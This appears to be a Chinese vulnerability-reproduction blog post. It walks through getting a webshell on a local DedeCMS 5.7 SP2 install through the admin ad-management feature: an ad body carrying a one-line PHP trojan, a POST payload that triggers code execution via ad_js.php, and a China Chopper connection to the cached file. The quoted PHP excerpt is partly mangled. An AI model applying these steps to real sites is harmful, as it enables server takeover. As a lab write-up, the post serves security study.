Dedecms 5.7 SP2后台广告管理处getshell

Dedecms 5.7 SP2后台广告管理处getshell

dedecms版本可以到织梦官网下载:http://www.dedecms.com/products/dedecms/downloads/

1、搭建成功,后台管理系统

Dedecms 5.7 SP2后台广告管理处getshell_第1张图片

2、进入后台后,找到广告,新增一个广告

Dedecms 5.7 SP2后台广告管理处getshell_第2张图片

3、填写广告内容,嵌入一句话木马

Dedecms 5.7 SP2后台广告管理处getshell_第3张图片

4、提交,抓包,发现添加成功

Dedecms 5.7 SP2后台广告管理处getshell_第4张图片

5、查看广告代码,有相应的地址 /DedeCMSv5/src/plus/ad_js.php?aid=3

Dedecms 5.7 SP2后台广告管理处getshell_第5张图片

6、访问,并查看页面源代码

http://127.0.0.1:82/DedeCMSv5/src/plus/ad_js.php?aid=3

Dedecms 5.7 SP2后台广告管理处getshell_第6张图片
Dedecms 5.7 SP2后台广告管理处getshell_第7张图片

7、查看代码ad_js.php

 $cfg_puccache_time )
{
    $row = $dsql->GetOne("SELECT * FROM `#@__myad` WHERE aid='$aid' ");
    $adbody = '';
    if($row['timeset']==0)
    {
        $adbody = $row['normbody'];
    }
    else
    {
        $ntime = time();
        if($ntime > $row['endtime'] || $ntime < $row['starttime']) {
            $adbody = $row['expbody'];
        } else {
            $adbody = $row['normbody'];
        }
    }
    $adbody = str_replace('"', '\"',$adbody);
    $adbody = str_replace("\r", "\\r",$adbody);
    $adbody = str_replace("\n", "\\n",$adbody);
    $adbody = "\r\n";
    $fp = fopen($cacheFile, 'w');
    fwrite($fp, $adbody);
    fclose($fp);
}
include $cacheFile;

8、进入hackabr环境,添加postdata,nocache=1&123=echo ‘–>’;phpinfo();

(此处省略较多代码审计过程,其中123是前面一句话木马的密码)
Dedecms 5.7 SP2后台广告管理处getshell_第8张图片

9、经验告诉我们,执行代码后,写入的“恶意“代码文件存放之/data/cache目录下

Dedecms 5.7 SP2后台广告管理处getshell_第9张图片

10、找到这个文件,用菜刀连接,连接成功,成功拿下shell

Dedecms 5.7 SP2后台广告管理处getshell_第10张图片

你可能感兴趣的:(漏洞复现,cms,shell,安全漏洞)